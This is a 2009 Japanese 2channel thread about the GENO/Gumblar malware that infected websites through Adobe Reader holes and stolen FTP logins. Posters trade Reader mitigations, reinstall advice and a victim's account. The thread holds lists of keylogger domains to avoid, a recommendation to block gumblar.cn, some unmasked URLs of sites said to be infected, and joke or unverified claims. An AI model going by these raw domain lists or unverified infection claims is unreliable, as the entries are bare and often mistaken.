GENOウイルススレ ★3

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

以下、おまいらテキトーに調査結果、感染サイト情報、テンプレ等をコピペしてくださいです。。。
2名無しさん@お腹いっぱい。:2009/04/28(火) 02:34:58
重複
3名無しさん@お腹いっぱい。:2009/04/28(火) 02:42:34
>>1
4名無しさん@お腹いっぱい。:2009/04/28(火) 02:45:33
>>1

>>2
重複してねーよ。GENO社員乙
5名無しさん@お腹いっぱい。:2009/04/28(火) 11:01:22
このサイトをブックマーク推奨
ttp://www3.atword.jp/gnome/
6名無しさん@お腹いっぱい。:2009/04/28(火) 12:41:19
7名無しさん@お腹いっぱい。:2009/04/28(火) 12:55:24
>>1
乙でした
8名無しさん@お腹いっぱい。:2009/04/28(火) 13:06:12
  解決したね
  次スレいらね

とか

  もうネタもないし
  次スレいらね

は、もはや様式美なのでスルーしてください。
9名無しさん@お腹いっぱい。:2009/04/28(火) 13:53:01
>>5
これよく出てくるけど、何のサイトだろう
10名無しさん@お腹いっぱい。:2009/04/28(火) 16:47:29
>>6
Judas Priest - Genocide  (w
11名無しさん@お腹いっぱい。:2009/04/28(火) 19:12:56
重複
12名無しさん@お腹いっぱい。:2009/04/29(水) 01:34:00
>>9
GENO含めたセキュリティ対策情報のブログちゃん
13名無しさん@お腹いっぱい。:2009/04/29(水) 01:45:06
>>5
ν速でftp使うなっていってた人より情報速かったな
14名無しさん@お腹いっぱい。:2009/04/29(水) 07:22:48
Genoウィルス祭り再び? Adobe Readerの新たなゼロデイ脆弱性に対する攻撃コードが公開
http://tsushima.2ch.net/test/read.cgi/news/1240948172/l50
15名無しさん@お腹いっぱい。:2009/04/29(水) 10:03:55
キャッシュ削除したらお金が降ってきました!
美女がくっついて離れません!
全てがうまくいきました!
16名無しさん@お腹いっぱい。:2009/04/29(水) 17:39:18
むかし、注文個数0.001とかして遊んでたことあったろ?
アレの反撃だよたぶん
17名無しさん@お腹いっぱい。:2009/04/29(水) 19:20:10
このGENOウィルスも豚インフルの大流行を見越しての仕込み
だったとしたならば作った奴はかなりの強者
18名無しさん@お腹いっぱい。:2009/04/29(水) 19:21:31
強者
↑これって読みは”きょうじゃ”じゃなくて”きょうしゃ”だったのか
知らんかった
19某所からコピペ:2009/04/29(水) 19:47:35
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reade以外の環境設定をどうするかも各自考える必要があります。
20名無しさん@お腹いっぱい。:2009/04/29(水) 20:02:10
>>19

ShellExView などで Adobe PDF Link Helper を無効にしておくと、よりいいかも。
無効にしても「PDFファイルが全然開けなくなる」訳ではなさそう。

蛇足だが
×>Adobe Reade
○>Adobe Reader
21名無しさん@お腹いっぱい。:2009/04/29(水) 21:18:47
>>19-20

Adobe Reader Speed Launcher をスタートアップから外す
こともやったほうがいいですよ。

レジストリの書き換えが必要ですけど
「いじくるつくーる」などのソフトを使えばレジストリを意識せずに楽勝です。
22名無しさん@お腹いっぱい。:2009/04/29(水) 22:55:43
>>19-21
これは本当のことですか?
それとも釣りですか?
なんかもう何を信じていいのかわからない…
23名無しさん@お腹いっぱい。:2009/04/29(水) 22:56:13
>>18
釣られてやろう
いまどきの中国産のIMEは
コワモテは変換できてもツワモノは変換されない
24名無しさん@お腹いっぱい。:2009/04/29(水) 23:15:34
>>22
自分を信じろ
25名無しさん@お腹いっぱい。:2009/04/29(水) 23:24:05
強面
26名無しさん@お腹いっぱい。:2009/04/29(水) 23:56:55
漢字二通りあるからなあ
27名無しさん@お腹いっぱい。:2009/04/30(木) 00:39:01
GENOは対応が糞レベルだったんで晒しておいても問題ないが、
zlkonでも検索できるようにした方が良かったんじゃないかな?
28名無しさん@お腹いっぱい。:2009/04/30(木) 01:19:17
これはGeno?

yaplogjp.com/blog/
29名無しさん@お腹いっぱい。:2009/04/30(木) 01:44:25
>>28
違うけどヤプログの偽者
MMO界隈で有名な中華のドメイン
アカウントを盗む目的でキーロガーを仕込む
30名無しさん@お腹いっぱい。:2009/04/30(木) 05:52:50
MMO界隈で有名なドメイン名の例(GENOウイルスではないが危険)

アカウントハック(アカウントを盗む)目的で、キーロガーを仕込む

踏むな危険→yaplogjp.com←踏むな危険
踏むな危険→atewikijp.com←踏むな危険
踏むな危険→gomenifty.com←踏むな危険
踏むな危険→aimeblog.com←踏むな危険
踏むな危険→cavle-online.com←踏むな危険
31名無しさん@お腹いっぱい。:2009/04/30(木) 13:51:15
次スレいらないね
32名無しさん@お腹いっぱい。:2009/04/30(木) 13:59:39
GENO社員乙
33名無しさん@お腹いっぱい。:2009/04/30(木) 14:02:00
ラトビア特急、路線拡大中

2009/04/09(木)  7560 個
2009/04/17(金)  8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/30(木) 13456 個のドメインを感染させています。

少し落ち着いてきたかな?
34名無しさん@お腹いっぱい。:2009/04/30(木) 14:07:10
>>31
はええよw
35名無しさん@お腹いっぱい。:2009/04/30(木) 14:32:19
プ
36名無しさん@お腹いっぱい。:2009/04/30(木) 14:51:35
>>31
早漏乙
37名無しさん@お腹いっぱい。:2009/04/30(木) 14:52:37
>>28
踏んでしまったとしたらOS入れなおし推奨だよ
38名無しさん@お腹いっぱい。:2009/04/30(木) 16:14:55
このウイルスってPdfが読めないと感染しないのでしょうか?
もしそうだとしたら例えば普段 Foxit ReaderをUSBメモリに入れて置いて、読むときだけ繋げたりしたら…。
面倒くさいですけど。

39名無しさん@お腹いっぱい。:2009/04/30(木) 17:27:57
感染して自分のサイトにスクリプト埋め込まれた。
サイト直して、OSクリーンインスコしたが、また自サイトがやられてたので、
FTPログ調べたら、海外から勝手に書き換えられてた模様。

感染中に接続したFTPのIDとPASSがどっかに送られてたんだろうな...
FTPのパス変えないと他の感染マシンからやられる感じだ。

.htmlファイル は bodyタグの前に、
.jsファイルは最終行にそれぞれ埋め込まれてたお。
40名無しさん@お腹いっぱい。:2009/04/30(木) 17:49:09
>>39
二次被害出さないようにしろよ
41名無しさん@お腹いっぱい。:2009/04/30(木) 18:04:57
>>40
誠にお恥ずかしい。
パス変えて、こまめにログチェックするお
42名無しさん@お腹いっぱい。:2009/04/30(木) 18:13:08
>>39
その海外の接続先は特定出来ないの?
43名無しさん@お腹いっぱい。:2009/04/30(木) 18:19:58
2箇所からアクセスがあって、どっちもIPの割当国はアメリカだった。
多分、どっかで感染したクライアントPCじゃないかな。
44名無しさん@お腹いっぱい。:2009/04/30(木) 18:20:23
>>39
FTP以外も監視してるかもしれないらしいからWebのフリーメール
なんかを使ってたらそのへんもパスワード変更推奨
参考サイト
http://www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1868

あと被害サイトを訪問しちゃった人のためにちゃんと告知してあげてね
45名無しさん@お腹いっぱい。:2009/04/30(木) 18:22:19
アクセス元はきっとゾンビだと思うよ
46名無しさん@お腹いっぱい。:2009/04/30(木) 18:22:43
>>44
うん、その辺も全部変えた。
FTPログ見たら、書き換えられてから直すまでの訪問者ゼロwww


Orz
47名無しさん@お腹いっぱい。:2009/04/30(木) 18:24:00
間違い。FTPログじゃなくてWebの方のアクセスログね...Orz
48名無しさん@お腹いっぱい。:2009/04/30(木) 19:52:29
ゴールデンウィークはOSのクリーンインストールをしましょう!
49名無しさん@お腹いっぱい。:2009/04/30(木) 21:13:35
カスペオンラインスキャン壊れた!
何度もページ再読み込みして止まらない…
トレンドマイクロみたく乗っ取られたかな?

http://www.kaspersky.com/kos/jp/partner/default/pages/default/check.html?n=1241092961537
50名無しさん@お腹いっぱい。:2009/04/30(木) 21:14:14
>>46
普段それなりに閲覧者がいるサイトだったとしたらそれは不自然かもしれない
元から自分のオナニー用サイトなら問題ないかも

ログファイルを書き込みロックしたり上書きしたりなんてことも
ありえるのかなーとおもったけど、どうなんだろうね
51名無しさん@お腹いっぱい。:2009/04/30(木) 21:17:08
>>49
異常あるようには見えない
なんでもかんでも壊れたっていうんじゃなくて
自分の環境を疑ったほうが良いと思うよ
52名無しさん@お腹いっぱい。:2009/04/30(木) 21:30:11
Adobe Reader/Acrobatに新たな脆弱性、回避策はJavaScript無効化
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
53名無しさん@お腹いっぱい。:2009/04/30(木) 21:44:16
Adobe Readerなんてほんとインストールするもんじゃないな
54名無しさん@お腹いっぱい。:2009/04/30(木) 21:51:18
>>52
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
>また、現時点でこの脆弱性の悪用が一般に出回っていることは確認されていないとして、

おい、ちょっと待てw
55名無しさん@お腹いっぱい。:2009/04/30(木) 22:56:15
PDF表示だけにしときゃいいものをゴテゴテ機能付けるからこうなるんだよな・・・
56名無しさん@お腹いっぱい。:2009/05/01(金) 00:32:25
アドビは重くて穴だらけだな
57名無しさん@お腹いっぱい。:2009/05/01(金) 00:47:52
>>54
つまり他にも山ほど脆弱性があるんですよ
58名無しさん@お腹いっぱい。:2009/05/01(金) 00:54:27

     ( ´・ω・)   みんな〜メキシコ土産だよ〜
     ( っ¶¶と
    (ニ二二二ニ)
     )=========(
    ()   .() |
    /ヽ======/、
  (( レ |ヽ_/、| ))
     |/ | |/
       /ハ
      ヘ⌒ヽフ
      (  ・ω・)
     {  U Ul
      ヾ.,____,ノ

59名無しさん@お腹いっぱい。:2009/05/01(金) 01:19:21
>>56
>>19-21を適切に行えば、軽くなるし穴も減らせる。
60名無しさん@お腹いっぱい。:2009/05/01(金) 03:34:27
     ___ハ__
チャ   、____丿
 チャ   ゙゙( ゚━゚)  アミーゴ
  チャ  /゙゙゙c○c○)) アミーゴ

チャ   __ハ__
 チャ  、____丿
  チャ   (゚━゚ )´´  ハバネロ
  ((( ○。○。゙゙゙\   ハバネロ
61名無しさん@お腹いっぱい。:2009/05/01(金) 09:15:30
>>51
よく居るんだ・・・

手元のPCがおかしいのに
「サーバーにつながらない!なんか設定変えた!?(怒」
「ネットワークできないんだけど!バグってんの!?(怒」
とか電話してくるやつがさ。

まずは隣の人に聞けっての('A`)


Adobe Readerはadmとかで設定を集中管理出来ないもんかね。
62名無しさん@お腹いっぱい。:2009/05/01(金) 12:59:58
ttp://www.nht-osaka.com/news/owabi.html
こんな感じでいっぱいあるんだろうな

スレは鎮火しぎみだけど
早く駆除ツールとか出てほしいけど放置なんかな
63名無しさん@お腹いっぱい。:2009/05/01(金) 13:20:23
次スレいらないなぁ
64名無しさん@お腹いっぱい。:2009/05/01(金) 14:07:40
ファイル書き換えしちゃうから駆除はできても元に戻るわけじゃないのよね
駆除自体もファイルがころころかわるから難しいみたいだし
65名無しさん@お腹いっぱい。:2009/05/01(金) 14:34:02
きりがないからネット用のPCは別にした
ダウンロードしたファイル置き場も別にした
これはこれできりがないかも。。。
66名無しさん@お腹いっぱい。:2009/05/01(金) 15:25:38
Adobe Readerもういらない。
アンインストールしようとしたら
なかなかしぶとかった。
で、PDFは何でみようかな。。
67名無しさん@お腹いっぱい。:2009/05/01(金) 16:46:05
>>66
PDFを見れるマンガビューワーで良くない?
AdobeFlashの代用ってあるんだろうか?
68名無しさん@お腹いっぱい。:2009/05/01(金) 17:09:08
全てsandboxie上で実行すれば
69名無しさん@お腹いっぱい。:2009/05/02(土) 03:33:24
>>67-68
ありがとう。
70名無しさん@お腹いっぱい。:2009/05/02(土) 03:59:44
これってFTP接続時にハックされるの?
それともFFFTPなんかのソフトにあるリストをハックするの?
71名無しさん@お腹いっぱい。:2009/05/02(土) 04:23:20
このウイルスに感染すると
winnyとかshareに異常がきたすって有るかな?
両方とも今までに無いエラーでおちた
72名無しさん@お腹いっぱい。:2009/05/02(土) 12:13:14
>>71
は?死ねよ
73>>71:2009/05/02(土) 12:18:13

  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/
74名無しさん@お腹いっぱい。:2009/05/02(土) 14:18:32
>>70
接続時に見ています
75名無しさん@お腹いっぱい。:2009/05/02(土) 17:05:08
>>71
ダウソ板から出てくるなよ
76名無しさん@お腹いっぱい。:2009/05/02(土) 18:28:18
>>71
いろいろ感染してそう
77名無しさん@お腹いっぱい。:2009/05/02(土) 19:03:58
71が叩かれるのはなぜ?
78名無しさん@お腹いっぱい。:2009/05/02(土) 19:33:51
蹴飛ばし推奨ドメイン
gumblar.cn
79名無しさん@お腹いっぱい。:2009/05/02(土) 20:29:26
>>78
thx! 早速対応した。
80名無しさん@お腹いっぱい。:2009/05/02(土) 23:23:54
81名無しさん@お腹いっぱい。:2009/05/03(日) 04:23:27
>>61
サーバがおかしいのに自分の使用しているPCに原因があると思って
いろんな設定いじったり、アンインストールしたりした事無いだろお前は
82名無しさん@お腹いっぱい。:2009/05/03(日) 08:18:26
次スレいる?
83名無しさん@お腹いっぱい。:2009/05/03(日) 11:55:19
******* 危険 *******

照英 オフィシャル・サイト
hxxp://www。s-progress。com/talent/show-a/
Analysis report for hxxp://www_s-progress_com/talent/show-a/
現在感染中(6日目に突入)
一応メール送ってるけど反応なし
2009.05.03 AM08 JST 継続

ソース↓
ttp://www3.atword.jp/gnome/
84名無しさん@お腹いっぱい。:2009/05/03(日) 12:17:37
>>83
乙w鎮火するどころか新型インフルみたいにヌルヌル進行してるな
85名無しさん@お腹いっぱい。:2009/05/03(日) 12:20:01
照英のも同型?
86名無しさん@お腹いっぱい。:2009/05/03(日) 12:21:40
GENOウイルスは進化してマッチョウイルスになった?
87名無しさん@お腹いっぱい。:2009/05/03(日) 12:56:56
GWで鯖缶もいないって状態なんだろうか
88名無しさん@お腹いっぱい。:2009/05/03(日) 13:28:43
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/690-n
【ウィルス情報質問 総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/876-n
89名無しさん@お腹いっぱい。:2009/05/03(日) 16:10:44
>>81
ユーザがおかしいのに自分の管理しているサーバに原因があると思って
いろんな設定いじったり、アンインストールしたりする事あるのかお前は
90名無しさん@お腹いっぱい。:2009/05/03(日) 17:09:43
ttp://www.pen-house.net/brand/brand0119.html
ここのペン先一覧に飛んだらavastがお怒りになられたんだが
もしかしてGENOウイルス罹ってる?
91名無しさん@お腹いっぱい。:2009/05/03(日) 17:21:15
大手が感染したらやばいな
92名無しさん@お腹いっぱい。:2009/05/03(日) 19:17:04
今回のウイルスってアクロバットリーダーのバージョン5
とか古すぎるやつにも対応してるの?
もし対応しててアウトならfoxitかな。最新版は重すぎるし。
でもfoxitはたまに読めないやつがあるんだよな。
93名無しさん@お腹いっぱい。:2009/05/03(日) 19:20:12
んな古いのはもう論外だろ
94名無しさん@お腹いっぱい。:2009/05/03(日) 23:55:56
でも余計な機能が付いていないから踏んでも何も起きないんじゃないかと思うが
95名無しさん@お腹いっぱい。:2009/05/04(月) 00:08:38
>>94
ただ、もし脆弱性があったとしても、放置される可能性があるけどな。
96名無しさん@お腹いっぱい。:2009/05/04(月) 01:50:41
>>94
とっくに塞がれた他の穴が山ほど空いてるだろ…
97名無しさん@お腹いっぱい。:2009/05/04(月) 01:54:41
放置される可能性があるなんてレベルじゃなく、ほぼ確実に放置なんじゃねーの?

>余計な機能が付いていない
表現能力が低い素のHTMLであってもそのブラウザに致命的なバグがどれだけあったか思い出せば、ね
そもそもPDF自体がPostScriptに色々機能をくっ付けた形式なわけで
98名無しさん@お腹いっぱい。:2009/05/04(月) 01:56:04
>>94
javascriptの機能がないバージョンなら問題ないだろ
99名無しさん@お腹いっぱい。:2009/05/04(月) 09:44:33
mosaicが懐かしい・・・
100名無しさん@お腹いっぱい。:2009/05/04(月) 10:10:45
>>99
Mosaicを実際に使っていた日本人ってかなり少なくないか?
翌年にはNetscape Navigatorが出てたし。
101名無しさん@お腹いっぱい。:2009/05/04(月) 10:28:52
PC98にFreeBSD(98)にX-WindowでMosaic
楽しかったな・・・
102名無しさん@お腹いっぱい。:2009/05/04(月) 13:22:40
103名無しさん@お腹いっぱい。:2009/05/04(月) 13:59:41
104名無しさん@お腹いっぱい。:2009/05/04(月) 14:22:10
>>102
踏んじまったじゃないか・・・
105名無しさん@お腹いっぱい。:2009/05/04(月) 14:54:48
>>102-103 のリンク先URL 踏むな危険!絶惨感染中

>>102-103
URLだけ黙って張るなんて……

踏んじゃったじゃないか……
さようなら……orz
106名無しさん@お腹いっぱい。:2009/05/04(月) 14:58:05
>83にあるURLをわざわざ踏むなんて……
107名無しさん@お腹いっぱい。:2009/05/04(月) 15:01:21
>>102は罪に問われるんじゃないのかこれ
108名無しさん@お腹いっぱい。:2009/05/04(月) 15:08:45
>>102-103
てFLASHとreader最新にしとけば大丈夫とか関係なし?

踏んでないんだが、URLだけだと不意打ち食らうとキツイね。
firefox&NoScriptだったら、だいじょぶなのかな
109名無しさん@お腹いっぱい。:2009/05/04(月) 15:11:46
>>108
>てFLASHとreader最新にしとけば大丈夫とか関係なし?
Yes

>firefox&NoScriptだったら、だいじょぶなのかな
なおさら何の問題無い。(ただし、Noscriptの設定が全サイト許可になっていない場合)
110108:2009/05/04(月) 15:14:25
>>109
d

>>104-105
が踏んで…になってるから不安になっちまいました。
ここにいてもまだ対策してなかった or ギャグ なのかな?
111名無しさん@お腹いっぱい。:2009/05/04(月) 15:16:10
適当な記事にウソリンクでこれ貼られたら無防備に踏んでしまいそう。。
112名無しさん@お腹いっぱい。:2009/05/04(月) 15:23:24
>>107
最も罪に問われるべきは改竄した奴、
次いで(ゴールデンウィークとは言え)放置してる鯖管だろw
113名無しさん@お腹いっぱい。:2009/05/04(月) 15:35:45
102踏んでしまった・・・MACでも感染するのでしょうか?
114名無しさん@お腹いっぱい。:2009/05/04(月) 15:56:04
心配するぐらいなら、クリーンインストールしとけ。

パスワードやデータが流出してからでは遅いぜ。
115名無しさん@お腹いっぱい。:2009/05/04(月) 16:33:17
ttp://www.java.com/ja/
Sunのページなんだけどここって感染してる?
なんか表示がおかしいし、ソースもおかしいんだけど。
116名無しさん@お腹いっぱい。:2009/05/04(月) 16:45:08
鑑定スレじゃねーんだ失せろ
117名無しさん@お腹いっぱい。:2009/05/04(月) 17:03:33
>>115
実際にソース見てみると良いよ
最初の1000行以上が空白
Oracleって言うウィルスに感染してる
118名無しさん@お腹いっぱい。:2009/05/04(月) 17:55:46
それはたいへんだ やばいんじゃないか
119名無しさん@お腹いっぱい。:2009/05/04(月) 17:59:45
>>117

mjd?
オレこないだjavaダウンロードしちゃった!
それにもウイルス入ってんのかな!?
120名無しさん@お腹いっぱい。:2009/05/04(月) 18:40:38
>>117 の「最初の1000行以上が空白」について

参考までにWindows上のテキストエディターにて改行を数えてみたところ、
最初の空行(改行だけの行 および タブ+改行だけの行)は224行でした。
121名無しさん@お腹いっぱい。:2009/05/04(月) 19:37:53
103 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/04(月) 19:33:04
ttp://www.virustotal.com/analisis/a474db8500fb7b3456757048d535f5d0
ttp://www.virustotal.com/analisis/2332d6921a4d67aaa18af30e979ee20e
122名無しさん@お腹いっぱい。:2009/05/04(月) 19:40:47
結局GENOウィルスとはなんだったのか
123名無しさん@お腹いっぱい。:2009/05/04(月) 20:01:24
人生
124名無しさん@お腹いっぱい。:2009/05/04(月) 20:09:11
>>120
結局このウイルスはGENOとは違うみたいだがたいていのアンチウイルスソフト入れてれば防御&検知可能なの?
125名無しさん@お腹いっぱい。:2009/05/04(月) 20:16:38
もうあれから行ってないなあ・・・お気に入りから速攻削除したし、行く気もしないな。
126名無しさん@お腹いっぱい。:2009/05/04(月) 20:24:54
さすがの情弱ももうそろそろあすこは危ないって気づいてるだろ
127名無しさん@お腹いっぱい。:2009/05/04(月) 20:45:11
GENOウイルスについてのまとめサイトのURLってどこだったっけ?
128名無しさん@お腹いっぱい。:2009/05/04(月) 20:48:17
忘れたが全然更新してなかった希ガス何故か誰も利用しない
129名無しさん@お腹いっぱい。:2009/05/04(月) 21:09:42
GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
130名無しさん@お腹いっぱい。:2009/05/04(月) 21:40:13
ありがとう
131名無しさん@お腹いっぱい。:2009/05/04(月) 22:43:47
>>129 もよいですが >>5,>>9,>>12-13 も参考にすることを強くおすすめします
132名無しさん@お腹いっぱい。:2009/05/04(月) 23:26:10
>>117
カスペで何もデナカッタヨ.
誤検知じゃないの?
133名無しさん@お腹いっぱい。:2009/05/04(月) 23:30:29
>>117
ただの冗談じゃなかったの?
ttp://www.oracle.com/lang/jp/index.html
134名無しさん@お腹いっぱい。:2009/05/04(月) 23:31:48
>>132
あんたは、Oracleについてぐぐってこい。Sunを買収したとこだよ。
皮肉で言われていることだって気付くのが普通。
135名無しさん@お腹いっぱい。:2009/05/05(火) 00:49:53
GENOウイルスでオタオタする人がオラクルについていちいち知ってるわけないだろ
本気で困るやつもいるんだから、ここだけは親切にいこうぜ
136名無しさん@お腹いっぱい。:2009/05/05(火) 01:00:10
>>134

当方
情弱に於いて並ぶ者無し
137名無しさん@お腹いっぱい。:2009/05/05(火) 01:04:57
>>136
気にすんなw
知らないことなんて誰にでもあるさ
138名無しさん@お腹いっぱい。:2009/05/05(火) 20:20:38
ver.5は大丈夫なのか。
139名無しさん@お腹いっぱい。:2009/05/06(水) 12:20:43
>>19(亀レスですが)
1.がAdobe公式ページに載りました

Adobe - Security Advisories : APSA09-02 -
Buffer overflow issues in Adobe Reader and Acrobat
ttp://www.adobe.com/support/security/advisories/apsa09-02.html
140名無しさん@お腹いっぱい。:2009/05/06(水) 12:23:35
インスコしてるアンチウイルスソフトのテストしたいんだけど
どっかにウイルス置いてるとこないですかね
141名無しさん@お腹いっぱい。:2009/05/06(水) 12:45:34
>>140
eicar でもやっとけ。
142名無しさん@お腹いっぱい。:2009/05/06(水) 13:22:30
>>141
ありがとうございます
どうやら無事仕事してくれていることを確認しますた
143名無しさん@お腹いっぱい。:2009/05/06(水) 13:38:29
2ちゃんってほんと色んな事に詳しい人がいるんだなぁ…
>>19さん、疑ってごめん。
14419:2009/05/06(水) 15:28:44
許さねぇ・・・
もう誰も信じねぇ・・・
145名無しさん@お腹いっぱい。:2009/05/06(水) 15:35:00
>>144
?どうした?
146名無しさん@お腹いっぱい。:2009/05/06(水) 15:37:31
>>145

>>144は ここの>>19と無関係の偽物。誤爆風愉快犯の暇人。
147名無しさん@お腹いっぱい。:2009/05/06(水) 17:01:55
GENOって店、いまはもう大丈夫なの?
148名無しさん@お腹いっぱい。:2009/05/06(水) 17:05:39
>>147
それはあなた次第です!
149名無しさん@お腹いっぱい。:2009/05/06(水) 17:50:46
 
【社会】アドビ(Adobe)製品のセキュリティ問題に苦しめられる企業
 
http://tsushima.2ch.net/test/read.cgi/newsplus/1241598327/
150名無しさん@お腹いっぱい。:2009/05/06(水) 20:45:13
151名無しさん@お腹いっぱい。:2009/05/06(水) 20:51:44
やっとOS再インスコしてきたよ
もうGENOは開かない
キャッシュ削除で証拠隠滅しようとしたことは絶対に忘れない
152名無しさん@お腹いっぱい。:2009/05/06(水) 23:44:45
>>150
>>149と違いあるのかと思ったらモット低俗かよ
ν即民雑魚すぎ、だから(ry
153名無しさん@お腹いっぱい。:2009/05/07(木) 00:17:51
>>148
あそこは元からアウトだろwww
154名無しさん@お腹いっぱい。:2009/05/07(木) 06:33:14
>>151
オレもろくな対応をしなく誠実さの欠片もないホビコンのサイトは二度と覗かない
昨日開催のイベントで謝罪広告が一切無しなのは許せない
忙しくてOS再インスコするまで2週間もパソコン使えず迷惑した
155名無しさん@お腹いっぱい。:2009/05/07(木) 08:09:17
>>154
ホビコンでも2回くらい同じような書き込みしてただろw
今あそこは疥癬があれこれかえてウレチーって言ってるだけのアホスレになってるから
書き込むだけアホらしいよ。
運営がどうしようもないのはディーラーならよく分かってるからWFとトレフェスで頑張れ。
156名無しさん@お腹いっぱい。:2009/05/07(木) 15:45:38
Firefox用アドオンのLinkExtendってよいな。
Dr.Webプラグインはほとんどのサイトでクリーンって言われてしまうけど、
Google、Norton、McAfee等の評価を利用できる。
カスペあたりを入れておいて、ヤバ気なサイトはLinkExtendでチェックすれば
かなり安全な気がする。
https://addons.mozilla.org/ja/firefox/addon/10777
http://www.linkextend.com/
157名無しさん@お腹いっぱい。:2009/05/07(木) 17:44:37
>>156
AVGとの組み合わせだと、どうでしょうか?
158名無しさん@お腹いっぱい。:2009/05/07(木) 17:57:55
>>157
知らね。
入れてみればいいんじゃない?
機能も細かく個別に切ったりもできるし。
万が一他のプラグインとの食い合わせが悪かったら捨てちゃえばいいだけでしょ。
159名無しさん@お腹いっぱい。:2009/05/07(木) 19:43:58
www.beauty-wed.co.jp
なぜかここはgumblarがalertになってる。注入失敗?
160名無しさん@お腹いっぱい。:2009/05/07(木) 20:45:01
【重要】掲載広告における遷移先ページのウイルス感染について [2009/05/07]
ttp://www.heso-click.com/info/index.asp?info_code=264

>□対象の広告
>  競馬情報会社 ホースマンクラブ

>ホースマンクラブ様のサイトを閲覧されますと、「gumblar.cn」という
>ドメインからスクリプトがダウンロードされ、その後別のファイルをダウンロードして
>不正な処理が実行されるようです。
161名無しさん@お腹いっぱい。:2009/05/07(木) 21:12:09
>>160
その広告が掲載されてるポイントサイトにメールした。
今日になって広告が消されていたのが3サイト。
(へそクリック そんなバナナ preco)

そのままなのが2サイト。
(つぼマイル おこづかい生活)
162名無しさん@お腹いっぱい。:2009/05/07(木) 23:40:40
ホースマンクラブっての自体は今でもヤバいの?
aguseで調べても問題が検出されないんだよな。
生で踏む勇気はないw
163名無しさん@お腹いっぱい。:2009/05/07(木) 23:47:53
1時間くらい前に見に行ったら直ってたっぽい。
ちなみにその前はAVASTがガンガン反応してた。
サイト管理者のPCが直ってるかは不明w
164名無しさん@お腹いっぱい。:2009/05/07(木) 23:53:58
>>163
さんきゅ。
>>156のプラグインが役に立つのかどうか未だにわからん。
165名無しさん@お腹いっぱい。:2009/05/08(金) 04:25:03
156入れたら技術系サイトが表示されなくなった
無理やりjavascriptで書き換えてバグるっぽ
166名無しさん@お腹いっぱい。:2009/05/08(金) 04:57:43
>>165
例えばどこあたり?
@ITなんかは普通に表示できてるけど。
167名無しさん@お腹いっぱい。:2009/05/08(金) 18:47:45
ビッグ3破綻とインフルエンザですっかり影をひそめちまったな
もっと頑張らないと忘れられちまうな
168名無しさん@お腹いっぱい。:2009/05/08(金) 19:03:37
おーい
今さっきGENOからメールきたんだけど
もうwebサイトの方はういるしゅ抜きに戻ったの?

店舗に行くか・・・というかそこで買うのもなんか嫌だから
似たような店教えてくれ←感染しないとこおねがいw
169名無しさん@お腹いっぱい。:2009/05/08(金) 19:28:34
>>168
> もうwebサイトの方はういるしゅ抜きに戻ったの?

今のところは大丈夫なのかもね。
どんな対策を取ったのかまったくわからないから、パワーアップした
新種のGenoウィルスを食らう覚悟が必要だなw
170名無しさん@お腹いっぱい。:2009/05/08(金) 20:10:00
数日おきに入れ代わってるからな、GENOウイルス本体は。
171名無しさん@お腹いっぱい。:2009/05/08(金) 21:40:11
2chのサーバー会社にウイルス
http://tsushima.2ch.net/test/read.cgi/news/1241785943/
172名無しさん@お腹いっぱい。:2009/05/08(金) 21:56:20
じわじわ感染が広がってるな
GENOの最初の対処がまずかったのも一因か
173名無しさん@お腹いっぱい。:2009/05/08(金) 22:51:30
maidなんとかってのは踏んだことはないが、2ch見てたら自動的に踏んでるってこと?
もう勘弁してくれよ・・そういうのわかんないんだよ・・・
174名無しさん@お腹いっぱい。:2009/05/08(金) 23:06:36
>>173
専ブラ使ってないの?
175名無しさん@お腹いっぱい。:2009/05/08(金) 23:08:44
ヌーブラ愛用してます
176名無しさん@お腹いっぱい。:2009/05/08(金) 23:29:32
>>169,170
ほんとかよ・・・何が原因かわかってないのね
177名無しさん@お腹いっぱい。:2009/05/08(金) 23:30:10
専ブラ使ってる。
使ってたら大丈夫?
178名無しさん@お腹いっぱい。:2009/05/09(土) 00:11:55
>>173
2chのトップ(http://www.2ch.net)とちがくね?
179名無しさん@お腹いっぱい。:2009/05/09(土) 01:03:11
>>177
問題ないと思う
180名無しさん@お腹いっぱい。:2009/05/09(土) 01:08:59
>>178
>>179
ありがとう。
181名無しさん@お腹いっぱい。:2009/05/09(土) 01:57:30
